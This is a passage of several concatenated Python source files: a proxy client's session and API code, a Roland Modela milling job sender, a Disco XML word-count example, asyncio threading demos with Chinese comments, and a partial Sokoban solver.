# xlog.debug("%d is self", i)
continue
rthead.join()
# xlog.debug("end join %d", i)
#xlog.debug("end join roundtrip_thread")
def reset(self):
xlog.debug("session reset")
self.stop()
self.start()
def status(self):
out_string = "session_id:%s<br>\n" % self.session_id
out_string += "running:%d<br>\n" % self.running
out_string += "last_roundtrip_time:%d<br>\n" % (time.time() - self.last_roundtrip_time)
out_string += "last_download_data_time:%d<br>\n" % (time.time() - self.last_download_data_time)
out_string += "last_conn_id:%d<br>\n" % self.last_conn_id
out_string += "last_transfer_no:%d<br>\n" % self.last_transfer_no
out_string += "on_road_num:%d<br>\n" % self.on_road_num
out_string += "transfer_list:<br>\r\n"
for transfer_no in sorted(self.transfer_list.iterkeys()):
transfer = self.transfer_list[transfer_no]
if "start" in self.transfer_list[transfer_no]:
time_way = " t:" + str((time.time() - self.transfer_list[transfer_no]["start"]))
else:
time_way = ""
out_string += "[%d] %s %s<br>\r\n" % (transfer_no, json.dumps(transfer), time_way)
out_string += "<br>\n" + self.upload_task_queue.status()
out_string += "<br>\n" + self.download_order_queue.status()
out_string += "<br>\n" + self.ack_pool.status()
for conn_id in self.conn_list:
out_string += "<br>\n" + self.conn_list[conn_id].status()
return out_string
def login_session(self):
if len(g.server_host) == 0 or g.server_port == 0:
return False
try:
start_time = time.time()
magic = "P"
pack_type = 1
upload_data_head = struct.pack("<cBB8sIHII", magic, g.protocol_version, pack_type, str(self.session_id),
g.config.block_max_size, g.config.send_delay, g.config.windows_size,
g.config.windows_ack)
upload_data_head += struct.pack("<H", len(g.config.login_account)) + str(g.config.login_account)
upload_data_head += struct.pack("<H", len(g.config.login_password)) + str(g.config.login_password)
upload_post_data = encrypt_data(upload_data_head)
http_client = HTTP_client((g.server_host, g.server_port), g.proxy, g.config.use_https,
g.config.conn_life, cert=g.cert)
content, status, heads = http_client.request(method="POST", path="data", data=upload_post_data,
timeout=g.config.roundtrip_timeout)
time_cost = time.time() - start_time
if status != 200:
g.last_api_error = "session server login fail:%r" % status
xlog.warn("login session fail, status:%r", status)
return False
if len(content) < 6:
xlog.error("login data len:%d fail", len(content))
return False
info = decrypt_data(content)
magic, protocol_version, pack_type, res, message_len = struct.unpack("<cBBBH", info[:6])
message = info[6:]
if magic != "P" or protocol_version != 1 or pack_type != 1:
xlog.error("login_session time:%d head error:%s", 1000 * time_cost, utils.str2hex(info[:6]))
return False
if res != 0:
g.last_api_error = "session server login fail, code:%d msg:%s" % (res, message)
xlog.warn("login_session time:%d fail, res:%d msg:%s", 1000 * time_cost, res, message)
return False
g.last_api_error = ""
xlog.info("login_session time:%d msg:%s", 1000 * time_cost, message)
return True
except Exception as e:
xlog.exception("login_session e:%r", e)
return False
def create_conn(self, sock, host, port):
if not self.running:
xlog.warn("session not running, can't connect")
return
self.mutex.acquire()
self.last_conn_id += 1
conn_id = self.last_conn_id
self.mutex.release()
seq = 0
cmd_type = 0 # create connection
sock_type = 0 # TCP
data = struct.pack("<IBBH", seq, cmd_type, sock_type, len(host)) + host + struct.pack("<H", port)
self.send_conn_data(conn_id, data)
self.conn_list[conn_id] = base_container.Conn(self, conn_id, sock, host, port, g.config.windows_size,
g.config.windows_ack, True, xlog)
return conn_id
def close_all_connection(self):
xlog.info("start close all connection")
conn_list = dict(self.conn_list)
for conn_id in conn_list:
try:
xlog.debug("stopping conn_id:%d", conn_id)
self.conn_list[conn_id].stop(reason="system reset")
except Exception as e:
xlog.warn("stopping conn_id:%d fail:%r", conn_id, e)
pass
# self.conn_list = {}
xlog.debug("stop all connection finished")
def remove_conn(self, conn_id):
xlog.debug("remove conn_id:%d", conn_id)
try:
del self.conn_list[conn_id]
except:
pass
def send_conn_data(self, conn_id, data, no_delay=False):
if not self.running:
return
# xlog.debug("upload conn_id:%d, len:%d", conn_id, len(data))
buf = base_container.WriteBuffer()
buf.append(struct.pack("<BII", 2, 4 + len(data), conn_id))
buf.append(data)
self.upload_task_queue.put(buf, no_delay)
def download_data_processor(self, data):
try:
while len(data):
data_type, data_len = struct.unpack("<BI", data.get(5))
if data_type == 2: # data:
conn_id = struct.unpack("<I", data.get(4))[0]
payload = data.get_buf(data_len - 4)
if conn_id not in self.conn_list:
xlog.debug("DATA conn_id %d not in list", conn_id)
else:
# xlog.debug("down conn:%d len:%d", conn_id, len(payload))
self.conn_list[conn_id].put_cmd_data(payload)
else:
raise Exception("process_block, unknown type:%d" % data_type)
except Exception as e:
xlog.exception("download_data_processor:%r", e)
def touch_roundtrip(self):
self.upload_task_queue.put("")
def get_transfer_no(self):
with self.mutex:
self.last_transfer_no += 1
transfer_no = self.last_transfer_no
return transfer_no
def normal_roundtrip_worker(self, server_address):
last_roundtrip_download_size = 0
http_client = HTTP_client(server_address, g.proxy, g.config.use_https, g.config.conn_life, cert=g.cert)
while self.running:
if self.on_road_num > g.config.concurent_thread_num * 0.8:
block = True
elif last_roundtrip_download_size > g.config.block_max_size:
block = False
elif len(self.conn_list) > 0 and self.on_road_num < 1:
# keep at least one pulling thread
block = False
elif len(self.conn_list) > 0 and time.time() - self.last_download_data_time < 120 and \
self.on_road_num < g.config.concurent_thread_num * 0.1:
# busy, have data download
block = False
else:
block = True
if block:
get_timeout = 24 * 3600
else:
get_timeout = 0
# self.transfer_list[transfer_no]["stat"] = "get local data"
upload_data, send_sn = self.upload_task_queue.get(get_timeout)
transfer_no = self.get_transfer_no()
self.transfer_list[transfer_no] = {}
self.transfer_list[transfer_no]["sn"] = send_sn
send_data_len = len(upload_data)
upload_ack_data = self.ack_pool.get()
send_ack_len = len(upload_ack_data)
magic = "P"
pack_type = 2
if self.on_road_num > g.config.concurent_thread_num * 0.8:
server_timeout = 0
else:
server_timeout = g.config.roundtrip_timeout / 2
upload_data_head = struct.pack("<cBB8sIIBIH", magic, g.protocol_version, pack_type, str(self.session_id),
transfer_no,
send_sn, server_timeout, send_data_len, send_ack_len)
upload_post_buf = base_container.WriteBuffer(upload_data_head)
upload_post_buf.append(upload_data)
upload_post_buf.append(upload_ack_data)
upload_post_data = str(upload_post_buf)
upload_post_data = encrypt_data(upload_post_data)
try_no = 0
while self.running:
try_no += 1
sleep_time = min(try_no, 30)
self.last_roundtrip_time = time.time()
start_time = time.time()
with self.mutex:
self.on_road_num += 1
# xlog.debug("start roundtrip transfer_no:%d send_data_len:%d ack_len:%d", transfer_no, send_data_len, send_ack_len)
try:
self.transfer_list[transfer_no]["try"] = try_no
self.transfer_list[transfer_no]["stat"] = "request"
self.transfer_list[transfer_no]["start"] = time.time()
content, status, response = http_client.request(method="POST", path="data", data=upload_post_data,
timeout=g.config.roundtrip_timeout)
traffic = len(upload_post_data) + len(content) + 645
self.traffic += traffic
g.quota -= traffic
except Exception as e:
xlog.exception("request except:%r retry %d", e, try_no)
time.sleep(sleep_time)
continue
finally:
with self.mutex:
self.on_road_num -= 1
if status == 405: # session_id not exist on server
if self.running:
xlog.warn("server session_id not exist, start reset session")
self.reset()
return
elif status == 200:
recv_len = len(content)
if recv_len < 6:
xlog.error("roundtrip time:%d transfer_no:%d sn:%d send:%d status:%r retry:%d",
(time.time() - start_time) * 1000, transfer_no, send_sn, send_data_len, len(content),
status, try_no)
continue
content = decrypt_data(content)
data = base_container.ReadBuffer(content)
magic, version, pack_type = struct.unpack("<cBB", data.get(3))
if magic != "P" or version != g.protocol_version:
xlog.error("get data head:%s", utils.str2hex(content[:2]))
time.sleep(100)
break
if pack_type == 3: # error report
error_code, message_len = struct.unpack("<BH", data.get(3))
message = data.get(message_len)
xlog.warn("error report code:%d, msg:%s", error_code, message)
if error_code == 1: # no quota
xlog.warn("login x_server error:no quota")
self.stop()
return
else:
xlog.error("unknown error code:%d", error_code)
return
if pack_type != 2: # normal download traffic pack
xlog.error("pack type:%d", pack_type)
time.sleep(100)
break
sn, time_cost = struct.unpack("<II", data.get(8))
xlog.debug(
"roundtrip time:%d cost:%d transfer_no:%d send_sn:%d send:%d recv_sn:%d rcv:%d status:%r",
(time.time() - start_time) * 1000, time_cost, transfer_no, send_sn, send_data_len, sn,
len(content), status)
data_len = len(data)
if (sn > 0 and data_len == 0) or (sn == 0 and data_len > 0):
xlog.warn("get sn:%d len:%d %s", sn, data_len, data)
if sn:
self.last_download_data_time = time.time()
last_roundtrip_download_size = data_len
# xlog.debug("get sn:%d len:%d", sn, data_len)
self.download_order_queue.put(sn, data)
ack_pak = struct.pack("<Q", transfer_no)
self.ack_pool.put(ack_pak)
else:
last_roundtrip_download_size = 0
if send_data_len == 0 and data_len > g.config.block_max_size:
need_more_thread_num = int(g.config.concurent_thread_num * 0.5 - self.on_road_num)
if need_more_thread_num > 0:
for j in range(0, need_more_thread_num):
if self.on_road_num > g.config.concurent_thread_num * 0.5:
break
self.touch_roundtrip()
break
else:
xlog.warn("roundtrip time:%d transfer_no:%d send_sn:%d send:%d status:%r retry:%d",
(time.time() - start_time) * 1000, transfer_no, send_sn, send_data_len, status, try_no)
time.sleep(sleep_time)
del self.transfer_list[transfer_no]
xlog.info("roundtrip port:%d thread exit", server_address[1])
def calculate_quota_left(quota_list):
time_now = int(time.time())
quota_left = 0
if "current" in quota_list:
c_q_end_time = quota_list["current"]["end_time"]
if c_q_end_time > time_now:
quota_left += quota_list["current"]["quota"]
if "backup" in quota_list:
for qt in quota_list["backup"]:
b_q_quota = qt["quota"]
b_q_end_time = qt["end_time"]
if b_q_end_time < time_now:
continue
quota_left += b_q_quota
return quota_left
def get_api_server_http_client():
api_server = urlparse.urlparse(g.config.api_server)
http_client = HTTP_client((api_server.hostname, api_server.port), g.proxy, g.config.use_https, g.config.conn_life,
cert=g.cert)
return http_client
def call_api(path, req_info):
try:
start_time = time.time()
upload_post_data = json.dumps(req_info)
upload_post_data = encrypt_data(upload_post_data)
http_client = get_api_server_http_client()
content, status, heads = http_client.request(method="POST", path=path,
header={"Content-Type": "application/json"},
data=upload_post_data, timeout=g.config.roundtrip_timeout)
time_cost = time.time() - start_time
if status != 200:
reason = "status:%r" % status
xlog.warn("api:%s fail:%s t:%d", path, reason, time_cost)
g.last_api_error = reason
return False, reason
content = decrypt_data(content)
try:
info = json.loads(content)
except Exception as e:
g.last_api_error = "parse json fail"
xlog.warn("api:%s parse json:%s fail:%r", path, content, e)
return False, "parse json fail"
res = info["res"]
if res != "success":
g.last_api_error = info["reason"]
xlog.warn("api:%s fail:%s", path, info["reason"])
return False, info["reason"]
xlog.info("api:%s success t:%d", path, time_cost * 1000)
g.last_api_error = ""
return True, info
except Exception as e:
xlog.exception("order e:%r", e)
g.last_api_error = "%r" % e
return False, "except:%r" % e
def request_balance(account, password, is_register=False, update_server=True):
if is_register:
login_path = "register"
xlog.info("request_balance register:%s", account)
else:
login_path = "login"
req_info = {"account": account, "password": password}
res, info = call_api(login_path, req_info)
if not res:
return False, info
g.quota_list = info["quota_list"]
g.quota = calculate_quota_left(g.quota_list)
if g.quota <= 0:
xlog.warn("no quota")
if update_server:
g.server_host = str(info["host"])
g.server_port = info["port"]
xlog.info("update xt_server %s:%d", g.server_host, g.server_port)
g.balance = info["balance"]
xlog.info("request_balance host:%s port:%d balance:%f quota:%f", g.server_host, g.server_port,
g.balance, g.quota)
return True, "success"
|
rml_send.py
|
#
# rml_send_gui
# graphical interface for sending jobs to the Roland Modela
#
# Brian Mayton <bmayton@media.mit.edu>
# MIT 2011-2014
#
# (c) Massachusetts Institute of Technology 2011-2014
# Permission granted for experimental and personal use;
# license for commercial sale available from MIT.
# imports
from __future__ import with_statement
import serial
import sys
# import wx # Fiore Basile - Removed dependency
import threading
import time
import math
# global constants
RML_UNITS=40.0
SPEED_TRAVERSE = 15.0
# utility functions
def dist(x1, y1, z1, x2, y2, z2):
return math.sqrt(
pow(x1-x2, 2.0) +
pow(y1-y2, 2.0) +
pow(z1-z2, 2.0)
)
# Edited by Fiore on 10/06/2014
# to support callbacks so that info can be passed to the SockJS server
class RMLSender:
"""This class implements the parsing of RML files and sending to the
Modela."""
def __init__(self, port="/dev/ttyUSB0", target=None):
self.serialPort = port
self.serial = None
self.cmds = []
self.target = target
self.xr=[0,1]; self.yr=[0,1]; self.zr=[0,1]
self.paths = []
self.segments_done = []
self.traverses = []
self.traverses_done = []
self.speed_feed = 15.0
self.speed_plunge = 5.0
self.total_distance = 1.0
self.distance_milled = 0.0
self.total_time = 1.0
self.time_remaining = 1.0
self.time_start = None
self.current_cmd = ""
self.cur_cmd_start = time.time()
self.cur_cmd_duration = 0.0
self.running = False
self.thread = threading.Thread(target=self.thread_fn)
self.should_stop = threading.Event()
self.done = threading.Event()
self.aborted = threading.Event()
self.lock = threading.Lock()
def load_file(self, filename):
self.cmds = []
f = open(filename, "r")
data = f.read()
f.close()
self.cmds = data.split(";")
self.calculate_metrics()
## FB: Added callback
if self.target:
self.target.callback('millingInfo', self)
def calculate_metrics(self):
paths = []
traverses = []
cur_path = []
xmin, ymin, zmin = 99999999, 999999999, 999999999
xmax, ymax, zmax = 0, 0, 0
xpos, ypos, zpos = 0, 0, 0
zup, zdown = 0, 0
speeds, speedz = 0.0, 0.0
total_distance = 0.0
total_time = 0.0
in_path = False
for cmd in self.cmds:
cmd=cmd.strip()
try:
if cmd[:3] == "!PZ":
params = cmd[3:].split(',')
if len(params) < 2:
params = cmd[3:].split(' ')
zup = int(params[1])
zdown = int(params[0])
print "pen: %d up, %d down" % (zup, zdown)
elif cmd[:2] == "VS":
params = cmd[2:].split(',')
if len(params) < 2:
params = cmd[2:].split(' ')
speeds = float(params[0])
print "xy speed: %f mm/s" % (speeds)
elif cmd[:3] == "!VZ":
params = cmd[3:].split(',')
if len(params) < 2:
params = cmd[3:].split(' ')
speedz = float(params[0])
print "z speed: %f mm/s" % (speedz)
elif cmd[:2] == "PU":
params = cmd[2:].split(',')
if len(params) < 2:
params = cmd[2:].split(' ')
if len(params) < 2:
continue
x = int(params[0])
y = int(params[1])
z = zup
d = dist(xpos, ypos, zpos, x, y, z)
total_distance += d
total_time += d / RML_UNITS / SPEED_TRAVERSE
traverses.append([(xpos, ypos, zpos), (x, y, z)])
xpos = x; ypos = y; zpos = z;
xmax = max(x, xmax); ymax = max(y, ymax); zmax = max(z, zmax)
xmin = min(x, xmin); ymin = min(y, ymin); zmin = min(z, zmin)
if len(cur_path) > 0:
paths.append(cur_path)
cur_path = []
elif cmd[:1] == "Z":
params = cmd[1:].split(',')
if len(params) < 2:
params = cmd[1:].split(' ')
x = int(params[0])
y = int(params[1])
z = int(params[2])
dist_xy = math.hypot(xpos-x, ypos-y) / RML_UNITS
dist_z = float(zpos-z) / RML_UNITS
time_xy = dist_xy / speeds
time_z = dist_z / speedz
total_time += max(time_xy, time_z)
total_distance += dist(xpos, ypos, zpos, x, y, z)
xpos = x; ypos = y; zpos = z;
xmax = max(x, xmax); ymax = max(y, ymax); zmax = max(z, zmax)
xmin = min(x, xmin); ymin = min(y, ymin); zmin = min(z, zmin)
cur_path.append((x, y, z))
except:
print "ignoring: %s" % cmd
pass
self.paths = paths
self.traverses = traverses
self.speed_feed = speeds
self.speed_plunge = speedz
self.xr = (xmin, xmax)
self.yr = (ymin, ymax)
self.zr = (zmin, zmax)
self.total_distance = total_distance
if self.total_distance == 0: self.total_distance = 1.0
self.total_time = total_time
if self.total_time == 0: self.total_time = 1.0
self.time_remaining = total_time
def start(self):
## Edit FB: we open the serial only when we start the thread
self.serial = serial.Serial(self.serialPort, baudrate=9600, rtscts=True, timeout=0)
self.running = True
self.time_start = time.time()
self.thread.start()
def abort(self):
if self.running and not self.done.isSet():
self.should_stop.set()
def thread_fn(self):
xmax, ymax, zmax = 0, 0, 0
xpos, ypos, zpos = 0, 0, 0
zup, zdown = 0, 0
speeds, speedz = 0.0, 0.0
with self.lock:
cmds = self.cmds
for cmd in cmds:
if self.target:
self.target.callback('progress', self)
cmd = cmd.strip()
if self.should_stop.isSet():
cmd="PA;PA;!VZ10;!PZ0,100;PU0,0;PD0,0;!MC0;"
self.serial.write(cmd)
self.serial.close()
self.aborted.set()
if self.target:
self.target.callback('done', self)
return
cmd=cmd.strip()
with self.lock:
self.current_cmd = cmd
self.cur_cmd_start = time.time()
self.cur_cmd_duration = 0.0
while (self.serial.getDSR() != True):
time.sleep(0.001)
self.serial.write(cmd)
try:
if cmd[:3] == "!PZ":
params = cmd[3:].split(',')
if len(params) < 2:
params = cmd[3:].split(' ')
zup = int(params[1])
zdown = int(params[0])
elif cmd[:2] == "VS":
params = cmd[2:].split(',')
if len(params) < 2:
params = cmd[2:].split(' ')
speeds = float(params[0])
with self.lock:
self.speed_feed = speeds
elif cmd[:3] == "!VZ":
params = cmd[3:].split(',')
if len(params) < 2:
params = cmd[3:].split(' ')
speedz = float(params[0])
with self.lock:
self.speed_plunge = speedz
elif cmd[:2] == "PU":
params = cmd[2:].split(',')
if len(params) < 2:
params = cmd[2:].split(' ')
if len(params) < 2:
continue
x = int(params[0])
y = int(params[1])
z = zup
d = dist(xpos, ypos, zpos, x, y, z)
t = d / RML_UNITS / SPEED_TRAVERSE
with self.lock:
self.cur_cmd_duration = t
self.time_remaining -= t
self.distance_milled += d
self.traverses_done.append(((xpos, ypos, zpos), (x, y, z)))
xpos = x; ypos = y; zpos = z;
elif cmd[:1] == "Z":
params = cmd[1:].split(',')
if len(params) < 2:
params = cmd[1:].split(' ')
x = int(params[0])
y = int(params[1])
z = int(params[2])
dist_xy = math.hypot(xpos-x, ypos-y) / RML_UNITS
dist_z = float(zpos-z) / RML_UNITS
time_xy = dist_xy / speeds
time_z = dist_z / speedz
t = max(time_xy, time_z)
with self.lock:
self.cur_cmd_duration = t
self.time_remaining -= t
self.distance_milled += dist(xpos, ypos, zpos, x, y, z)
self.segments_done.append(((xpos, ypos, zpos), (x, y, z)))
xpos = x; ypos = y; zpos = z;
time.sleep(self.cur_cmd_duration)
except:
print "ignoring: %s" % cmd
self.done.set()
if self.target:
self.target.callback('done', self)
|
xml_reader.py
|
import xml.sax
import threading
from Queue import Queue
from disco.core import Job, result_iterator
from disco.worker.classic.func import chain_reader
"""
For using this example, you should obtain an sml corpus and do the following:
1. Add the current directory to the python path
$ export PYTHONPATH=$PYTHONPATH:.
2. For the xml file, we will use a very small portion of wikipedia dump:
$ wget --no-check-certificate https://raw.githubusercontent.com/pooya/discostuff/master/sample.xml
(The actual wikipedia dump can be found here (very large file):
http://dumps.wikimedia.org/enwiki/latest/enwiki-latest-pages-articles.xml.bz2)
3. Use the xml_reader function in this file to extract the desried tags:
$ ddfs chunk data:xml:read ./sample.xml --reader xml_reader.xml_reader
for the wikipedia corpus, the desired tag is "text"
4. Then you can run any job that uses the content of this ddfs tag.
$ python xml_reader.py
"""
XML_TAG = "text"
DDFS_TAG = "data:xml:read"
QUEUE_SIZE = 8192
class ABContentHandler(xml.sax.ContentHandler):
def __init__(self, q):
xml.sax.ContentHandler.__init__(self)
self.q = q
def startElement(self, name, attrs):
self.tag = name
self.content = ""
def endElement(self, name):
if self.tag == XML_TAG:
self.q.put(self.content)
self.tag = ""
def characters(self, content):
if self.tag == XML_TAG:
self.content += content
class ReadProxy(object):
def __init__(self, stream, q):
self.stream = stream
self.buffer = ""
self.q = q
def read(self, size):
if self.buffer == "":
try:
self.buffer = self.stream.next()
except:
self.q.put(0)
return ""
if size < len(self.buffer):
buffer = self.buffer[:size]
self.buffer = self.buffer[size:]
return buffer
else:
return self._read()
def _read(self):
buffer = self.buffer
self.buffer = ""
return buffer
def xml_reader(stream, size, url, params):
q = Queue(QUEUE_SIZE)
xml_reader.rproxy = ReadProxy(stream, q)
threading.Thread(target=lambda q: xml.sax.parse(xml_reader.rproxy, ABContentHandler(q)),
args=(q,)).start()
while True:
item = q.get()
if item == 0:
return
yield item
q.task_done()
def map(line, params):
import __builtin__
unwanted = u",!.#()][{}-><=|/\"'*:?"
words = line.translate(__builtin__.dict.fromkeys([ord(x) for x in
unwanted], u" ")).lower()
for word in words.split():
yield word, 1
def reduce(iter, params):
from disco.util import kvgroup
for word, counts in kvgroup(sorted(iter)):
yield word, sum(counts)
if __name__ == '__main__':
job = Job().run(input=["tag://" + DDFS_TAG],
map=map,
reduce=reduce,
map_reader = chain_reader)
for line, count in result_iterator(job.wait(show=True)):
print(line, count)
|
96_ipc_asyncio-dev.py
|
# https://docs.python.org/zh-cn/3/library/asyncio-dev.html
# Debug 模式
"""
有几种方法可以启用异步调试模式:
1. 将 PYTHONASYNCIODEBUG 环境变量设置为 1 。
2. 使用 -X dev Python 命令行选项。
3. 将 debug=True 传递给 asyncio.run() 。
4. 调用 loop.set_debug() 。
除了启用调试模式外,还要考虑:
1. 将 asyncio logger 的日志级别设置为 logging.DEBUG,例如,下面的代码片段可以在应用程序启动时运行:
logging.basicConfig(level=logging.DEBUG)
2. 配置 warnings 模块以显示 ResourceWarning 警告。一种方法是使用 -W default 命令行选项。
启用调试模式时:
1. asyncio 检查 未被等待的协程 并记录他们;这将消除“被遗忘的等待”问题。
2. 许多非线程安全的异步 APIs (例如 loop.call_soon() 和 loop.call_at() 方法),如果从错误的线程调用,则会引发异常。
3. 如果执行I/O操作花费的时间太长,则记录I/O选择器的执行时间。
4. 执行时间超过100毫秒的回调将会载入日志。 属性 loop.slow_callback_duration 可用于设置以秒为单位的最小执行持续时间,这被视为“缓慢”。
asyncio使用 logging 模块,所有日志记录都是通过 "asyncio" logger执行的。
logging.getLogger("asyncio").setLevel(logging.WARNING)
"""
import asyncio
import threading
async def coro_func():
return await asyncio.sleep(1,result=42)
async def anther(loop):
# Later in another OS thread:
future = asyncio.run_coroutine_threadsafe(coro_func(), loop)
# Wait for the result:
result = future.result()
print(result)
def start_loop(loop):
# 运行事件循环, loop作为参数
asyncio.set_event_loop(loop)
loop.run_forever()
thread_loop = asyncio.new_event_loop() # 创建事件循环
run_loop_thread = threading.Thread(target=start_loop, args=(thread_loop,)) # 新起线程运行事件循环, 防止阻塞主线程
run_loop_thread.start() # 运行线程,即运行协程事件循环
loop = asyncio.new_event_loop() #asyncio.ProactorEventLoop() # asyncio.get_event_loop()
asyncio.run(anther(thread_loop)) # loop.run_until_complete(anther(thread_loop))
# anther(thread_loop) 一定要是线程loop
import asyncio
from threading import Thread
async def create_task(event_loop):
i = 0
while True:
# 每秒产生一个任务, 提交到线程里的循环中, event_loop作为参数
asyncio.run_coroutine_threadsafe(production(i), event_loop)
await asyncio.sleep(1)
i += 1
async def production(i):
while True:
print("第{}个coroutine任务".format(i))
await asyncio.sleep(1)
def start_loop(loop):
# 运行事件循环, loop作为参数
asyncio.set_event_loop(loop)
loop.run_forever()
thread_loop = asyncio.new_event_loop() # 创建事件循环
run_loop_thread = Thread(target=start_loop, args=(thread_loop,)) # 新起线程运行事件循环, 防止阻塞主线程
run_loop_thread.start() # 运行线程,即运行协程事件循环
main_loop = asyncio.new_event_loop()
main_loop.run_until_complete(create_task(thread_loop)) # 主线程负责create coroutine object
|
Solver.py
|
import numpy as np
import hashlib
import copy
import datetime
import threading
# Notation: [ROW][COL]
# Note: Add Forbidden Cells to improve the efficiency
# Check duplicate state in the search tree, keep DEPTH info
# Add Progress Monitoring
# ?Store Search Nodes for next batch
# ?Add Heuristic Move
# ?Multithreading
# ?Save Node while max steps/depths exceeded
# DEFINE:
# map[][]:
# -1: WALL
# -2: BOX
# -3: PLAYER
# -9: BLANK
MAP_BLANK = -9
MAX_STEP_COUNT_LST_SIZE = 256
MAX_STEPS = 28
MAX_DEPTH = 6
MAP_ROW = 8
MAP_COL = 8
FORBIDDEN = [[1,4],[1,5],[2,1],[3,1],[4,6],[5,6],[7,2],[7,3]]
g_para_total_state_searched = 0
g_para_max_exceeded = 0
g_para_duplicate_state_count = 0
g_para_duplicate_state_count2 = 0
g_progress = 0.0
g_progress_prv_time = datetime.datetime.now()
g_tm_CountSteps2 = datetime.timedelta(0)
g_lst_1 = np.empty((MAX_STEP_COUNT_LST_SIZE, 2),dtype='u2')
g_lst_2 = np.empty((MAX_STEP_COUNT_LST_SIZE, 2),dtype='u2')
g_para_tm_start = datetime.datetime.now()
g_para_tm_diff = datetime.timedelta(0)
def isNotForbidden( pos):
return ( pos not in FORBIDDEN )
def g_tm_start():
global g_para_tm_start
g_para_tm_start = datetime.datetime.now()
def g_tm_add():
global g_para_tm_start
global g_para_tm_diff
g_para_tm_diff += datetime.datetime.now() - g_para_tm_start
def g_tm_print( func_name):
global g_para_tm_diff
print( "Time Diff ({}): {}".format(func_name, g_para_tm_diff))
class STATE:
def __init__( self):
pass
def setup( self, mapstr):
i=-1
j=0
box=[]
wall=[]
for c in mapstr:
if( c=='#'):
i=i+1
j=0
continue
if( c=='P'):
player = [i,j]
j=j+1
continue
if( c=='W'):
wall.append([i,j])
j=j+1
continue
if( c=='B'):
box.append([i,j])
j=j+1
continue
j=j+1
self.set_wall( wall)
self.set_box( box)
self.set_player( player)
#print( self._player)
#print( self._wall)
#print( self._box)
def set_goal( self, lst):
self._goal = np.array( lst, dtype='b')
def set_box( self, lst):
self._box = np.array( lst, dtype='b')
def set_player( self, pos):
self._player = np.array( pos, dtype='b')
def set_wall( self, lst):
self._wall = np.array( lst, dtype='b')
def get_hexdigest( self):
m = hashlib.sha256()
m.update( self._player.tobytes())
#TODO: possible different orders for same positions of boxes
m.update( self._box.tobytes())
return m.hexdigest()
# print( "Move Box:", box_no, "Steps:", steps, "Dir:", mov_dir)
def moveBox( self, box_no, mov_dir):
self._player[0] = self._box[box_no][0]
self._player[1] = self._box[box_no][1]
self._box[box_no,0] += mov_dir[0]
self._box[box_no,1] += mov_dir[1]
def matchGoal( self, goal):
for elem in self._box:
if( [elem[0],elem[1]] not in goal):
return False
return True
def CountSteps2( map, state):
global g_tm_CountSteps2
tm_tmp = datetime.datetime.now()
i=1
lst = [[state._player[0],state._player[1]]]
while( len(lst) ):
next_lst = []
#print("step:", i)
for x,y in lst:
if( map[x-1,y]== MAP_BLANK): #UP
map[x-1,y] = i
next_lst.append([x-1,y])
if( map[x+1,y]== MAP_BLANK): #DOWN
map[x+1,y] = i
next_lst.append([x+1,y])
if( map[x,y-1]== MAP_BLANK): #LEFT
map[x,y-1] = i
next_lst.append([x,y-1])
if( map[x,y+1]== MAP_BLANK): #RIGHT
map[x,y+1] = i
next_lst.append([x,y+1])
lst = next_lst
#print( lst)
i=i+1
pass
map[state._player[0],state._player[1]] = 0
g_tm_CountSteps2 += datetime.datetime.now() - tm_tmp
pass
def CountSteps( map, state):
#print( state.get_hexdigest())
#map2 = map.copy()
# Add BOX, PLAYER to map
for val in state._box:
map[val[0],val[1]]= -2
map[state._player[0],state._player[1]] = -3
#print( map)
CountSteps2( map, state)
pass
def SearchEligibleMoves( map, state, moves, log):
i= -1
# Try to move the same box first
if(len(log)):
i = log[-1][0] # last moved box_no
#lst_mov_dir = log[-1][2]
x, y = state._box[i]
_U = map[x-1,y]
_D = map[x+1,y]
_L = map[x,y-1]
_R = map[x,y+1]
if( _U>=0 and _D>=0 ): #UP/DOWN
if( isNotForbidden([x-1,y])):
moves.append([[x+1,y],[-1,0],_D, i])
if( isNotForbidden([x+1,y])):
moves.append([[x-1,y],[1,0],_U, i])
else:
if( _U== MAP_BLANK and _D>=0 ): #UP
if( isNotForbidden([x-1,y])):
moves.append([[x+1,y],[-1,0],_D, i])
if( _U>=0 and _D== MAP_BLANK ): #DOWN
if( isNotForbidden([x+1,y])):
moves.append([[x-1,y],[1,0],_U, i])
if( _L>=0 and _R>=0): #LEFT/RIGHT
if( isNotForbidden([x,y-1])):
moves.append([[x,y+1],[0,-1],_R, i])
if( isNotForbidden([x,y+1])):
moves.append([[x,y-1],[0,1],_L, i])
else:
if( _L== MAP_BLANK and _R>=0): #LEFT
if( isNotForbidden([x,y-1])):
moves.append([[x,y+1],[0,-1],_R, i])
if( _L>=0 and _R== MAP_BLANK): #RIGHT
if( isNotForbidden([x,y+1])):
moves.append([[x,y-1],[0,1],_L, i])
j=i
for i, elem in enumerate( state._box):
if(j==i):
continue
x, y = elem
_U = map[x-1,y]
_D = map[x+1,y]
_L = map[x,y-1]
_R = map[x,y+1]
if( _U>=0 and _D>=0 ): #UP/DOWN
if( isNotForbidden([x-1,y])):
moves.append([[x+1,y],[-1,0],_D, i])
if( isNotForbidden([x+1,y])):
moves.append([[x-1,y],[1,0],_U, i])
else:
if( _U== MAP_BLANK and _D>=0 ): #UP
if( isNotForbidden([x-1,y])):
moves.append([[x+1,y],[-1,0],_D, i])
if( _U>=0 and _D== MAP_BLANK ): #DOWN
if( isNotForbidden([x+1,y])):
moves.append([[x-1,y],[1,0],_U, i])
if( _L>=0 and _R>=0): #LEFT/RIGHT
if( isNotForbidden([x,y-1])):
moves.append([[x,y+1],[0,-1],_R, i])
if( isNotForbidden([x,y+1])):
moves.append([[x,y-1],[0,1],_L, i])
else:
if( _L== MAP_BLANK and _R>=0): #LEFT
if( isNotForbidden([x,y-1])):
moves.append([[x,y+1],[0,-1],_R, i])
if( _L>=0 and _R== MAP_BLANK): #RIGHT
if( isNotForbidden([x,y+1])):
moves.append([[x,y-1],[0,1],_L, i])
pass
def Solve( state, goal):
# map : WALLS ONLY
# map = np.zeros((MAP_ROW, MAP_COL),dtype='b')
map = np.full((MAP_ROW, MAP_COL), fill_value=MAP_BLANK, dtype='b')
for val in state._wall:
map[val[0],val[1]]= -1
trace = {}
log = []
if( not Solve2( map, state, goal, 0, 0, trace, log, 100.0)):
print( "Cannot Solve!")
global g_para_total_state_searched
g_para_total_state_searched = len(trace)
def Solve2( map, state, goal, depth, total_steps, trace, log, progress_slot):
if( total_steps> MAX_STEPS or depth> MAX_DEPTH):
global g_para_max_exceeded
g_para_max_exceeded += 1
output_progress( progress_slot) # END_NODE
return False
# map2 : WALLS plus STEP COUNT
map2 = map.copy()
#Count steps to reachable blank squares
CountSteps( map2, state)
#print( map2)
#Remove illegible moves for the BOX
